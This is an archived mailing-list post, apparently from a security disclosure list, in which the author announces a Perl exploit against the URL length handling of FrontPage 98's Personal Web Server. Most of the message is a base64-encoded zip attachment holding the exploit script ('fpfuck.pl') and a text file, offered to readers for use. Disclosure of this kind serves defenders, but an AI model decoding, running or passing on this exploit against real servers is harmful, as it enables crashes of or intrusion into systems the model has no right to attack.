FrontPage Personal Web Server

• Previous message: Rogier Wolff: "Re: Insecure use of file in /tmp by trn"
• Next in thread: Kerb: "Re: FrontPage Personal Web Server"
• Reply: Kerb: "Re: FrontPage Personal Web Server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

------ =_NextPart_000_01BEED17.988F2020
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I'm sorry if this exploit has already been released, but to the best of my
knowledge, it hasn't.  This is a small exploit (written in perl) that takes
advantage of the poor URL length handling of FrontPage 98's personal web server
that is executed when you open/create a "web".  This exploit will work on most
machines with a perl interpreter, I coded it (and tested it, of course) on my
Wind0ze 95 machine.  If ya have any questions or comments about this script,
feel free to Email me.




-KerberosX	:	kerb [at] linuxfreak [dot] com






------ =_NextPart_000_01BEED17.988F2020
Content-Type: application/x-zip-compressed; name="fpfuck.zip"
Content-Transfer-Encoding: base64

UEsDBBQAAgAIALcaFyfPehux9AEAABAEAAAJAAAAZnBmdWNrLnBsrVNta9swEP6cQP7DUzfQBIzt
dutItgYWUqcd3ZqQhHWwDCPLaiLiSEZSugb64ye/5KVjsC/lvkh3z/Pc6U53euJvtPJjLvyMqbRR
b9QzxYXB1VUUhffX0WgY3Yb963DyKY/NT9/ack0MlRRmTBYMww1dfazValUA6EOvSZoirw6aKp4Z
JEzzhWAJjMQBmSiZHSm98wKve/EBv5ecLsH1AZgRZSAfj7DdDloVvu0dgAOZ2CRSgOCBi+4l1oQu
uWDYaC4WBxzB9WiKWLEc/YhxOPmKeIs7pmKmpP6xk3z73jXqf00pd+XWHA+jL/fhDD1c2Mk1p6PB
XTSdTcL+N+s6L4bZzKRtRA+doLoSY5gS1uNMITB4j+eOU4bMkuuIJImywYzQVWsHdneJ3MBF4BbW
Ljifnzg1fB3FW8O0peks5ablzz3fbfYnN99/Br9yYFMz9fQf6aJQ95VguypZSfsHelgwUxzjrSBr
1nIMzZwSoiVdMdPK3+9ir4jjhthbQW7j5aVRT7jlD4gQ0oAqRgxDqeFVinZXkp3evi9tvCKfGeSw
ikGlEIzui9i/+B8JS6Q3FxW1XMacCOfGjtN34MHpO3jGZRDkZ9zOZmP/3AvmwrKOSM4DS1MXqZQr
jZSvGLYE2dIumP2mZ2x9UsJpKjUrSssz/gFQSwMEFAACAAgAABsXJ2ZaKx/mAAAAQQEAAAoAAABm
cGZ1Y2sudHh0FY/BboQwDETvSPzD3Hqh+xFVWwn1stLuDwQyQNoQ09gs5e/rlXywrPGbmfuSFD7f
uxoCdA05Y2PN0LGmzRCpaS6MMEHbjDXogs8qxa5h5osipvJzIiezTBwcEANXKZe26XEExSjrlmnM
J/YSBhc5SB6sU5YDoURUHjUZ28YW4uN29cOc1FgvwE0wSUWRo0PvrKIpsiJ51rZ5l5tL+gmn7FjC
g447IY5xRfG/NViS0oG6cUze7GybMMhuWNzbc8y0J8s3/nHcjW4R2cETByWUHs+NVqp626fubZ/v
Nfx6vbZ5/WId/gFQSwECMgsUAAIACAC3Ghcnz3obsfQBAAAQBAAACQAAAAAAAAABACAAtoEAAAAA
ZnBmdWNrLnBsUEsBAjILFAACAAgAABsXJ2ZaKx/mAAAAQQEAAAoAAAAAAAAAAQAgALaBGwIAAGZw
ZnVjay50eHRQSwUGAAAAAAIAAgBvAAAAKQMAAAAA

------ =_NextPart_000_01BEED17.988F2020--

• Next message: Bob Todd: "Vulnerability in Solaris 2.6. rpc.statd ?"
• Previous message: Rogier Wolff: "Re: Insecure use of file in /tmp by trn"
• Next in thread: Kerb: "Re: FrontPage Personal Web Server"
• Reply: Kerb: "Re: FrontPage Personal Web Server"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:58:05 PDT